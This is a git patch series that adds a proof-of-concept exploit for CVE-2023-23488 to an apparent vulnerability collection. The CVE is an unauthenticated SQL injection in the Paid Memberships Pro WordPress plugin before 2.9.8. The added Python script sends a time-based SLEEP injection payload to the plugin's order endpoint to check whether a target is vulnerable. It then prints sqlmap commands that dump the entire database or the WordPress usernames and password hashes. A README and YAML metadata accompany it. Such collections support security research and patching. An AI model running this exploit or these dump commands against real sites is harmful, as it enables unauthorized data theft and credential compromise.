From e710cc2601147fcde6e03f550985c3e6bbc60879 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=90=95=E6=B3=8A=E4=BC=B8?= Date: Sat, 6 May 2023 04:14:41 +0000 Subject: [PATCH 1/2] CVE-2023-23488 CVE-2023-23488 POC MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 吕泊伸 --- .../2023/CVE-2023-23488/CVE-2023-23488.py | 59 +++++++++++++++++++ cve/WordPress/2023/CVE-2023-23488/README.md | 24 ++++++++ cve/WordPress/2023/yaml/CVE-2023-23488.yaml | 20 +++++++ 3 files changed, 103 insertions(+) create mode 100644 cve/WordPress/2023/CVE-2023-23488/CVE-2023-23488.py create mode 100644 cve/WordPress/2023/CVE-2023-23488/README.md create mode 100644 cve/WordPress/2023/yaml/CVE-2023-23488.yaml diff --git a/cve/WordPress/2023/CVE-2023-23488/CVE-2023-23488.py b/cve/WordPress/2023/CVE-2023-23488/CVE-2023-23488.py new file mode 100644 index 00000000..cc17f5aa --- /dev/null +++ b/cve/WordPress/2023/CVE-2023-23488/CVE-2023-23488.py @@ -0,0 +1,59 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +# https://github.com/r3nt0n +# +# Exploit Title: Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection +# +# Exploit Author: r3nt0n +# CVE: CVE-2023-23488 +# Date: 2023/01/24 +# Vulnerability discovered by Joshua Martinelle +# Vendor Homepage: https://www.paidmembershipspro.com +# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip +# Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9 +# Version: < 2.9.8 +# Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7 +# +# Running this script against a WordPress instance with Paid Membership Pro plugin +# tells you if the target is vulnerable. +# As the SQL injection technique required to exploit it is Time-based blind, instead of +# trying to directly exploit the vuln, it will generate the appropriate sqlmap command +# to dump the whole database (probably very time-consuming) or specific chose data like +# usernames and passwords. +# +# Usage example: python3 CVE-2023-23488.py http://127.0.0.1/wordpress + +import sys +import requests + +def get_request(target_url, delay="1"): + payload = "a' OR (SELECT 1 FROM (SELECT(SLEEP(" + delay + ")))a)-- -" + data = {'rest_route': '/pmpro/v1/order', + 'code': payload} + return requests.get(target_url, params=data).elapsed.total_seconds() + +print('Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n') +if len(sys.argv) != 2: + print('Usage: {} '.format("python3 CVE-2023-23488.py")) + print('Example: {} http://127.0.0.1/wordpress'.format("python3 CVE-2023-23488.py")) + sys.exit(1) + +target_url = sys.argv[1] +try: + print('[-] Testing if the target is vulnerable...') + req = requests.get(target_url, timeout=15) +except: + print('{}[!] ERROR: Target is unreachable{}'.format(u'\033[91m',u'\033[0m')) + sys.exit(2) + +if get_request(target_url, "1") >= get_request(target_url, "2"): + print('{}[!] The target does not seem vulnerable{}'.format(u'\033[91m',u'\033[0m')) + sys.exit(3) +print('\n{}[*] The target is vulnerable{}'.format(u'\033[92m', u'\033[0m')) +print('\n[+] You can dump the whole WordPress database with:') +print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump'.format(target_url)) +print('\n[+] To dump data from specific tables:') +print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users'.format(target_url)) +print('\n[+] To dump only WordPress usernames and passwords columns (you should check if users table have the default name):') +print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass'.format(target_url)) +sys.exit(0) \ No newline at end of file diff --git a/cve/WordPress/2023/CVE-2023-23488/README.md b/cve/WordPress/2023/CVE-2023-23488/README.md new file mode 100644 index 00000000..864263de --- /dev/null +++ b/cve/WordPress/2023/CVE-2023-23488/README.md @@ -0,0 +1,24 @@ +# CVE-2023-23488-PoC +Unauthenticated SQL Injection - Paid Memberships Pro < 2.9.8 (WordPress Plugin) + +Running this script against a WordPress instance with Paid Membership Pro plugin +tells you if the target is vulnerable. +As the SQL injection technique required to exploit it is Time-based blind, instead of +trying to directly exploit the vuln, it will generate the appropriate sqlmap command +to dump the whole database (probably very time-consuming) or specific chose data like +usernames and passwords. + +Usage example: + +```shell +python3 CVE-2023-23488.py http://127.0.0.1/wordpress +``` + + +## References + ++ Credits to **Joshua Martinelle**, who discovered the vulnerability ++ ExploitDB link: https://www.exploit-db.com/exploits/51235 ++ Vendor Homepage: https://www.paidmembershipspro.com ++ Vulnerable software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip ++ Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9 diff --git a/cve/WordPress/2023/yaml/CVE-2023-23488.yaml b/cve/WordPress/2023/yaml/CVE-2023-23488.yaml new file mode 100644 index 00000000..2707ba62 --- /dev/null +++ b/cve/WordPress/2023/yaml/CVE-2023-23488.yaml @@ -0,0 +1,20 @@ +id: CVE-2023-23488 +source: https://github.com/r3nt0n/CVE-2023-23488-PoC +info: + name: WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 + severity: critical + description: + WordPress Plugin The Paid Memberships Pro 2.9.8 版本之前存在SQL注入漏洞,该漏洞源于 /pmpro/v1/order 的 code 参数存在 SQL 注入问题。该poc展示了如何利用该漏洞 + scope-of-influence: + WordPress Plugin The Paid Memberships Pro ≤ 2.9.8 + reference: + - https://packetstormsecurity.com/files/171661/WordPress-Paid-Memberships-Pro-2.9.8-SQL-Injection.html + - https://www.tenable.com/security/research/tra-2023-2 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-23488 + cwe-id: CWE-89 + cnvd-id: None + kve-id: None + tags: cve2023, WordPress \ No newline at end of file -- Gitee From ae9ac43cddada4fe0c07294a400bc5dde96dc25e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=90=95=E6=B3=8A=E4=BC=B8?= Date: Sat, 6 May 2023 04:15:44 +0000 Subject: [PATCH 2/2] update other_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 吕泊伸 --- other_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/other_list.yaml b/other_list.yaml index 4627b27d..bf286e5e 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -66,6 +66,7 @@ cve: cnvd: WordPress: - CVE-2019-8942 + - CVE-2023-23488 Zimbra: - CVE-2022-41352 cnvd: -- Gitee